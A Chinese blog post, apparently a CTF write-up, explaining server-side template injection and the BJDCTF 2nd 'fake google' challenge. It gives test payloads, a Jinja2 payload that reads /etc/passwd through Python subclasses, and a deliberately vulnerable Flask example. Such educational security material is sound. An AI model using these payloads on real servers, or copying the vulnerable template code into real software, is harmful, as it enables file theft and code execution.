2. 程式人生 > 實用技巧 >ssti注入(伺服器模板注入) && BJDCTF 2nd fake google

ssti注入(伺服器模板注入) && BJDCTF 2nd fake google

阿新 發佈:2020-07-12

參考連結:

https://www.cnblogs.com/buchuo/p/12559408.html

https://www.cnblogs.com/tiaopidejun/p/12357245.html

https://www.cnblogs.com/gzs-monkey/p/10727330.html#autoid-0-0-0

0x00:SSTI介紹

ssti注入又稱伺服器端模板注入攻擊(Server-Side Template Injection),和sql注入一樣,也是由於接受使用者輸入而造成的安全問題。

它的實質就是伺服器端接受了使用者的輸入,沒有經過過濾或者說過濾不嚴謹,將使用者輸入作為web應用模板的一部分,但是在進行編譯渲染的過程中,執行了使用者輸入的惡意程式碼,造成資訊洩露,程式碼執行,getshell等問題。

這個問題主要是出在web應用模板渲染的過程中,目前比較流行的渲染引擎模板主要有:smarty,twig,jinja2,freemarker,velocity

百度百科:模板引擎(這裡特指用於Web開發的模板引擎)是為了使使用者介面與業務資料(內容)分離而產生的,它可以生成特定格式的文件,用於網站的模板引擎就會生成一個標準的HTML文件。

0x01:測試方法

BJDCTF 2nd fake google

輸入任何東西,都會顯示在頁面上

<script>alert('1')</script> 還有XSS但沒用

測試payload

?name={{2*3}}

?name={{1+2}}  //這個需要把 + URL編碼一下  即 {{1%2b2}}

python3 讀取檔案

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}

ssti注入工具

https://github.com/epinna/tplmap

一題:https://blog.csdn.net/qq_40827990/article/details/82940894

python OS 模組執行命令

簡單的漏洞測試程式碼

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
Jinja2 = Environment()

@app.route("/page")
def page():

    name = request.values.get('name')
    
    # SSTI VULNERABILITY
    # The vulnerability is introduced concatenating the
    # user-provided `name` variable to the template string.
    output = Jinja2.from_string('Hello ' + name + '!').render()
    
    # Instead, the variable should be passed to the template context.
    # Jinja2.from_string('Hello {{name}}!').render(name = name)

    return output

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

1

相關推薦

ssti注入(伺服器模板注入) &amp;&amp; BJDCTF 2nd fake google

參考連結: https://www.cnblogs.com/buchuo/p/12559408.html https://www.cnblogs.com/tiaopidejun/p/12357245.html

SSTI伺服器模板注入)以及常見利用方式

0x00 前言 簡單介紹下,由於模板引擎支援使用靜態模板檔案,並在執行時用HTML頁面中的實際值替換變數/佔位符,從而讓HTML頁面的設計變得更容易。當前廣為人知且廣泛應用的模板引擎有Smarty、Twig、Jinja2、FreeMark

[BJDCTF 2nd]fake google

00x1分析題目 開啟頁面,首先是一個goole搜尋框,輸入內容後Enter,頁面顯示P3\'s girlfirend is : xxxx

SSTI-服務端模板注入漏洞

原理: 服務端模板注入是由於服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而導致了敏感資訊洩露、程式碼執行、GetShell 等問題。其

SSTI-服務端模板注入

SSTI-服務端模板注入漏洞 原理: 服務端模板注入是由於服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而導致了敏感資訊洩露、程式碼執

服務端模板注入攻擊 SSTI

1. SSTI模板注入(Server-side template injection)a. 伺服器模板注入是當攻擊者能夠用本地的模板語法去注入一個惡意的payload,然後再伺服器端執行改模板的攻擊手法。b. 模板引擎使用過將固定模板與多邊資料結合起

攻防世界-web-Confusion1(python模板注入SSTI、沙箱逃逸)

題目來源:XCTF 4th-QCTF-2018題目描述:某天,Bob說:PHP是最好的語言,但是Alice不贊同。所以Alice編寫了這個網站證明。在她還沒有寫完的時候,我發現其存在問題。(請不要使用掃描器)

Spring中ObjectFactory的使用以及與FactoryBean 的區別&amp;amp;ServletRequest、ServlertResponse物件注入方式

  在研究ServletRequest 以及 ServletResponse 等注入的過程中,發現還有一個ObjectFactory 物件,簡單研究下其使用以及原理。

SSTI模板注入)漏洞

學習於:https://www.cnblogs.com/bmjoker/p/13508538.html 模板引擎 模板引擎(這裡特指用於Web開發的模板引擎)是為了使使用者介面與業務資料(內容)分離而產生的,它可以生成特定格式的文件,利用模板引擎來

【JDBC】學習路徑3-密碼登入&amp;amp;SQL注入攻擊

最後再提醒一句,每次在測試JDBC程式的時候,一定要確保MySQL正在執行。 開啟控制檯(終端),輸入mysql

[BJDCTF 2nd]簡單注入

掃描目錄後發現robots.txt 訪問hint.txt 題目提示了一句SQL語句 select * from users where username=\'$_POST[\"username\"]\' and password=\'$_POST[\"password\"]\';

模板-Bellman-Ford&amp;SPFA

Bellman-Ford演算法 求最短路的 這個演算法基於一個叫做“鬆弛”的操作 鬆弛會試圖往最短路中加邊來縮短最短路

Thymeleaf 模板注入導致命令執行

以下文章來源於Medi0cr1ty,作者medi0cr1ty 本文配合:https://github.com/veracode-research/spring-view-manipulation/ 食用更佳。

鯤鵬雲伺服器上安裝Docker&amp;&amp;docker-compose

一臺鯤鵬920架構arm64版本ECS 規格: 8vCPUs | 16GB | kc1.2xlarge.2 CentOS 7.6 64bit with ARM 1.下載,docker官方提供的aarch64的二進位制包:

python 模板注入

何為模板注入模板引擎可以讓(網站)程式實現介面與資料分離,業務程式碼與邏輯程式碼的分離,這大大提升了開發效率,良好的設計也使得程式碼重用變得更加容易。

【轉】 前端筆記之Vue(四)UI元件庫&amp;amp;Vuex&amp;amp;虛擬伺服器初識

【轉】 前端筆記之Vue(四)UI元件庫&amp;Vuex&amp;虛擬伺服器初識 一、日曆元件

XCTF:easytornado(python模板注入

開啟網頁發現有幾個目錄,整理後: http://220.249.52.133:35356/file?filename=/flag.txt&amp;filehash=ae495bad95220a5138f3437fb9919a29

NOIP知識點&amp;&amp;模板整理【更新中】

目錄NOIP知識點&amp;&amp;模板整理資料結構線段樹1線段樹2樹狀陣列1樹狀陣列2st表單調佇列(滑動視窗)平衡樹(fhq treap)圖論最小生成樹單源最短路(dijkstra)單源最短路(SPFA)負環差分約束LCA(最近公共祖先)

P1923 【深基9.例4】求第 k 小的數&amp;&amp;P1177 【模板】快速排序

First Second 快速排序還是很重要的 #include<iostream> #include<cstdio> #include<algorithm>

flask模板注入payload——python2和python3

模板注入的payload記錄在這裡,方便以後使用。 主要分為兩類python2和python3 還有各種過濾和繞過